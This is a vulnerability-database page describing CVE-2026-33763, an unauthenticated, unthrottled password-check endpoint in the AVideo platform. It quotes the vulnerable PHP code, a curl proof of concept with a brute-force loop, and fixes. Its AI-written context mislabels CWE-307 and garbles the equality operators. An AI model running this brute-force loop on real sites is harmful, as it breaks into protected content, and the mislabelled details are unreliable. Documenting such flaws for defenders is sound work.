Skip to main content

PHP CVE-2026-33763

MEDIUM
Improper Restriction of Excessive Authentication Attempts (CWE-307)
2026-03-26 https://github.com/WWBN/AVideo
5.3
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.3 MEDIUM
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

3
Analysis Generated
Mar 26, 2026 - 18:15 vuln.today
Patch released
Mar 26, 2026 - 18:15 nvd
Patch available
CVE Published
Mar 26, 2026 - 18:07 nvd
MEDIUM 5.3

DescriptionGitHub Advisory

Summary

The get_api_video_password_is_correct API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean passwordIsCorrect field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords.

Details

The vulnerable endpoint is defined at plugin/API/API.php:1111-1133:

php
public function get_api_video_password_is_correct($parameters)
{
    $obj = new stdClass();
    $obj->videos_id = intval($parameters['videos_id']);
    $obj->passwordIsCorrect = true;
    $error = true;
    $msg = '';

    if (!empty($obj->videos_id)) {
        $error = false;
        $video = new Video('', '', $obj->videos_id);
        $password = $video->getVideo_password();
        if (!empty($password)) {
            $obj->passwordIsCorrect = $password == $parameters['video_password'];
        }
    } else {
        $msg = 'Videos id is required';
    }

    return new ApiObject($msg, $error, $obj);
}

The get() dispatcher at API.php:191-209 routes GET requests directly to this method without any authentication enforcement:

php
public function get($parameters) {
    // ... optional user login if credentials provided ...
    $APIName = $parameters['APIName'];
    if (method_exists($this, "get_api_$APIName")) {
        $str = "\$object = \$this->get_api_$APIName(\$parameters);";
        eval($str);
    }
}

The application has a checkRateLimit() mechanism (line 5737) that is applied to user registration (line 4232) and user deactivation (line 5705), but is not applied to this password verification endpoint.

Additionally, video passwords are stored in plaintext (objects/video.php:523-527):

php
public function setVideo_password($video_password) {
    AVideoPlugin::onVideoSetVideo_password($this->id, $this->video_password, $video_password);
    $this->video_password = trim($video_password);
}

The comparison at line 1125 uses loose equality () rather than strict equality (=).

PoC

Step 1: Identify a password-protected video

bash
curl -s "http://localhost/plugin/API/get.json.php?APIName=video&videos_id=1" | jq '.response.rows[0].video_password'

A non-empty value (e.g., "1") indicates the video is password-protected.

Step 2: Test incorrect password (oracle returns false)

bash
curl -s "http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct&videos_id=1&video_password=wrongguess"

Expected response:

json
{"response":{"videos_id":1,"passwordIsCorrect":false},"error":false}

Step 3: Brute-force the password

bash
for pw in password 123456 secret admin test video1 qwerty; do
  result=$(curl -s "http://localhost/plugin/API/get.json.php?APIName=video_password_is_correct&videos_id=1&video_password=$pw" | jq -r '.response.passwordIsCorrect')
  echo "$pw: $result"
  [ "$result" = "true" ] && echo "FOUND: $pw" && break
done

No rate limiting is encountered regardless of request volume.

Step 4: Unlock the video with the discovered password

bash
curl -s "http://localhost/view/video.php?v=1&video_password=DISCOVERED_PASSWORD" -c cookies.txt

The password is stored in the session (CustomizeUser.php:806-807) granting persistent access.

Impact

An attacker can brute-force the password of any password-protected video on the platform without authentication. Since video passwords are typically simple shared secrets (not per-user credentials), common password dictionaries are likely to succeed quickly. Successful exploitation bypasses the access control for password-protected content, which may include commercially sensitive, private, or restricted video content. The lack of any rate limiting means an attacker can test thousands of passwords per second.

Recommended Fix

  1. Add rate limiting to the endpoint using the existing checkRateLimit() mechanism:
php
public function get_api_video_password_is_correct($parameters)
{
    $this->checkRateLimit('video_password_check', 5, 300); // 5 attempts per 5 minutes per IP

    $obj = new stdClass();
    $obj->videos_id = intval($parameters['videos_id']);
    // ... rest of existing code
}
  1. Hash video passwords using password_hash()/password_verify() instead of plaintext storage and loose comparison:
php
// In setVideo_password:
$this->video_password = password_hash(trim($video_password), PASSWORD_DEFAULT);

// In the check endpoint:
$obj->passwordIsCorrect = password_verify($parameters['video_password'], $password);
  1. Use strict comparison (===) if plaintext passwords must be retained temporarily during migration.

AnalysisAI

AVideo password verification API endpoint allows unauthenticated attackers to brute-force video access passwords at network speed with no rate limiting, enabling compromise of password-protected video content across the platform. The vulnerable endpoint pkg:composer/wwbn_avideo returns a boolean confirmation for any password guess without authentication, CAPTCHA, or throttling mechanisms, combined with plaintext password storage and loose equality comparison that further weakens defenses. Publicly available exploit code exists demonstrating rapid password enumeration against any video ID.

Technical ContextAI

The vulnerability resides in AVideo (pkg:composer/wwbn_avideo), a PHP-based video hosting platform. The root cause is classified under CWE-307 (Improper Restriction of Rendered UI Layers or Frames) and involves multiple weaknesses: (1) an unauthenticated API endpoint at plugin/API/API.php:1111-1133 that performs password verification without rate limiting via the get() dispatcher at line 191-209, (2) plaintext password storage in objects/video.php:523-527 without cryptographic hashing, and (3) loose equality comparison () instead of strict (=) at line 1125. The application has an existing checkRateLimit() mechanism used elsewhere (e.g., user registration at line 4232, user deactivation at line 5705) but it was not applied to this endpoint. The dispatcher uses eval() to dynamically route requests to API methods, creating a flexible but unauthenticated exposure surface.

RemediationAI

Apply the upstream fix from commit 01a0614fedcdaee47832c0d913a0fb86d8c28135 available at https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135. The patch implements rate limiting via checkRateLimit('video_password_check', 5, 300) to allow 5 password verification attempts per 5 minutes per IP address, and upgrades password storage to use password_hash()/password_verify() with PASSWORD_DEFAULT algorithm instead of plaintext comparison. Until patching is possible, implement network-level rate limiting on the /plugin/API/get.json.php endpoint using Web Application Firewall (WAF) rules to restrict requests with APIName=video_password_is_correct to 5 per 5 minutes per source IP, disable password-protected videos if not operationally critical, and restrict API endpoint access to trusted IP ranges via reverse proxy authentication. Additionally, audit logs for brute-force attempt patterns (multiple failed password_is_correct checks for the same video_id) to detect active exploitation.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-33763 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy